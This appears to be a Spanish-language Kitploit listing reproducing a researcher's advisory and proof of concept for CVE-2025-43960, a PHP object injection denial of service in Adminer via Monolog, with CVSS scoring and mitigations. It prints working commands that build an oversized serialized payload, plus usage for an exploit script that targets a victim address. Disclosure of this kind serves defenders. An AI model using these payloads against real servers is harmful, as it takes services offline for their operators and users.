Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-43960 — # Exploit de inyección de objetos PHP para Adminer <4.8.1 a través de Monolog, que provoca denegación de servicio mediante payloads serializados manipulados. Incluye PoC, puntuación CVSS y guía de mitigación. | Kitploit
Herramientas/GitHubGitHub/far00t01/cve-2025-43960
Generación de PayloadsAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones Web
GitHubfar00t01/cve-2025-43960

CVE-2025-43960

# Exploit de inyección de objetos PHP para Adminer <4.8.1 a través de Monolog, que provoca denegación de servicio mediante payloads serializados manipulados. Incluye PoC, puntuación CVSS y guía de mitigación.

Ver Repositorio
13hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-43960 - Inyección de Objetos PHP en Adminer < 4.8.1 vía Monolog - Denegación de Servicio (DoS)

Después de meses esperando una respuesta de MITRE, obtuve el CVE-2025-43960 con un ataque de Inyección de Objetos PHP contra el servicio Adminer (<4.8.1), causando una Denegación de Servicio (DoS) mediante Manipulación de Memoria.

https://github.com/user-attachments/assets/ebf7d8e8-01db-4d02-bb12-33321c749458

Resumen

Esta vulnerabilidad permite a atacantes remotos no autenticados explotar instancias de Adminer 4.8.1 que usan Monolog, causando una Denegación de Servicio (DoS) mediante Inyección de Objetos PHP. El vector de ataque no requiere autenticación ni interacción del usuario, lo que lo convierte en un problema de alta gravedad (CVSS 7.5) con potencial de escalar a 8.6 en ciertos entornos compartidos.

Descripción sugerida

Adminer 4.8.1, cuando utiliza Monolog para el registro de eventos, permite una denegación de servicio (consumo de memoria) mediante un payload serializado manipulado, como uno con una cadena s:1000000000, también conocido como un problema de Inyección de Objetos PHP. La vulnerabilidad afecta a instancias de Adminer que utilizan Monolog para el registro, donde la entrada de usuario no confiable se deserializa sin una validación adecuada. Al enviar un objeto deserializado de gran tamaño, un atacante puede forzar un consumo elevado de memoria, haciendo que la interfaz de Adminer no responda y provocando una DoS en todo el servidor.

  • Si bien el servidor puede recuperarse después de varios minutos, múltiples solicitudes concurrentes pueden causar un fallo total, requiriendo intervención manual para restaurar el servicio.

Puntuación CVSS v3.1

Puntuación base: 7.5 (Alta)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Nota sobre despliegues específicos:

Si el fallo de Adminer también interrumpe otros servicios/inquilinos (p. ej., contenedor o proceso compartido), Alcance: Cambiado puede aplicarse:

  • Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H
  • Puntuación: 8.6 (Alta)

Información adicional

Posibles Medidas de Mitigación

  • Evita usar unserialize() sobre datos no confiables dentro de Adminer y Monolog.
  • Aplica límites de memoria (memory_limit) en PHP para prevenir el consumo excesivo de recursos.
  • Usa allowed_classes en unserialize() para restringir la deserialización de clases no autorizadas.

Proveedor del Producto

  • Adminer

Base del Código del Producto Afectado

  • Adminer < 4.8.1 (última versión estable en el momento de las pruebas)

Componente Afectado

  • Integración de Monolog en Adminer

Característica problemática

  • Inyección de Objetos PHP vía unserialize()

Área potencialmente afectada

  • Cualquier instancia de Adminer donde se utilice el registro basado en Monolog

Prueba de Concepto (PoC)

Generación del payload:

root@kitploit:~
head -c 1000000000 </dev/zero | tr '\0' 'D' > filler.txt
root@kitploit:~
echo 'O:32:"Monolog\\Handler\\SyslogUdpHandler":2:{
   s:9:"*socket";r:2;
   s:10:"*handler";s:1000000000:"'$(cat filler.txt)'";
 }' > payload.txt

Impacto:

  • El servidor entra en un estado de carga, haciendo que Adminer sea inaccesible.
  • El frontend desaparece por completo mientras la conexión está activa.
  • Cuando el ataque cesa, el servidor se recupera después de unos minutos, a menos que se utilicen varias máquinas (escenario DDoS).

Requisitos de Instalación

  • Python: Asegúrate de tener Python 3.x instalado. Puedes comprobarlo ejecutando python3 --version en tu terminal.

Dependencias de Python

  • Flask: Se utiliza para ejecutar el servidor HTTP local que sirve el payload.
  • requests: Se utiliza para interactuar con la aplicación objetivo durante el proceso de explotación.

Instalación

root@kitploit:~
git clone https://github.com/far00t01/CVE-2025-43960
cd CVE-2025-43960 
pip install -r requirement.txt
python3 cve-2025-43960.py

Uso del exploit:

root@kitploit:~
python3 cve-2025-43960.py 

Usage: cve-2025-43960.py <ip-listener> <port-listener> <ip-victim:port>
Example: python3 cve-2025-43960.py 198.51.100.11 80 203.0.113.11:8000

Referencias

  • https://www.adminer.org
  • https://github.com/vrana/adminer
  • https://github.com/Seldaek/monolog
  • https://www.cvedetails.com/product/44183/Adminer-Adminer.html?vendor_id=17755
  • https://cwe.mitre.org/data/definitions/502.html
  • https://cwe.mitre.org/data/definitions/400.html
  • https://cwe.mitre.org/data/definitions/789.html

Descubridor

Fabian Rosales (@far00t01) Medium.

Descargar herramienta